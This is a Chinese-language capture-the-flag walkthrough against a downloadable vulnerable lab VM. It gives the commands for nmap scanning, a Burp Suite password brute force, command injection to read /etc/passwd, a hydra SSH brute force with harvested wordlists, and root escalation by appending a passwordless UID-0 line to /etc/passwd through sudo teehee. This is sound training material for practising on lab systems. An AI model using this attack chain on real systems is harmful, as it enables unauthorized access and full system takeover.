靶机链接:https://pan.baidu.com/s/1Bcy6_fOXj4ysZTcBIUOxpw 提取码:eefe
首先查看kali虚拟机的ip地址 ifconfig 可以看到我们kali的虚拟机ip为192.168.159.145 接着使用nmap工具进行扫描,获取靶机的IP地址 nmap -sP 192.168.159.2/24 打开靶机的虚拟机设置,选择网络适配器-高级,查看我们靶机的mac地址。与扫描的结果匹配,发现靶机的IP为192.168.159.142
继续使用namp对靶机进行全盘扫描,并将结果导出 nmap -A 192.168.159.142 -p 1-65535 -oN nmap.A 发现其80端口开启,使用浏览器尝试访问 发现一个登陆界面,猜测用户名为admin,使用burpsuit工具进行密码爆破 添加密码字典后进行爆破
发现其密码为happy,使用帐号密码进行登录 我们发现可以执行一些系统命令 通过burpsuit进行抓包观察 经过尝试发现存在命令注入漏洞 接着查看passwd文件 依次查看各个用户的家目录,在jim用户的家目录下发现旧的密码备份文件 将这些密码复制到kali中,制作密码字典 vim passwd.bak 创建用户名字典 vim user.dic 根据nmap扫描结果,我们知道靶机开启22端口并且是ssh服务。利用制作的用户名字典和密码字典对ssh进行爆破,并将结果导出 hydra -L user.dic -P passwd.bak ssh://192.168.159.142 -vV -o hydra.ssh 通过查看导出结果可以得到一组用户名密码 jim jibril04 尝试使用ssh登录 ssh jim@192.168.159.142 成功登录
使用基本命令查看 cd /var/mail cat jim 得到另一组用户名和密码charles ^xHhA&hvim0y 尝试使用登录 ssh charles@192.168.159.142 成功登录 查看可以不需要密码就可以使用root权限执行的命令 sudo -l 在psaawd 文件末尾追加
sudo teehee -a /etc/passwd GGG::0:0:::/bin/bash 提权成功,拿到flag
|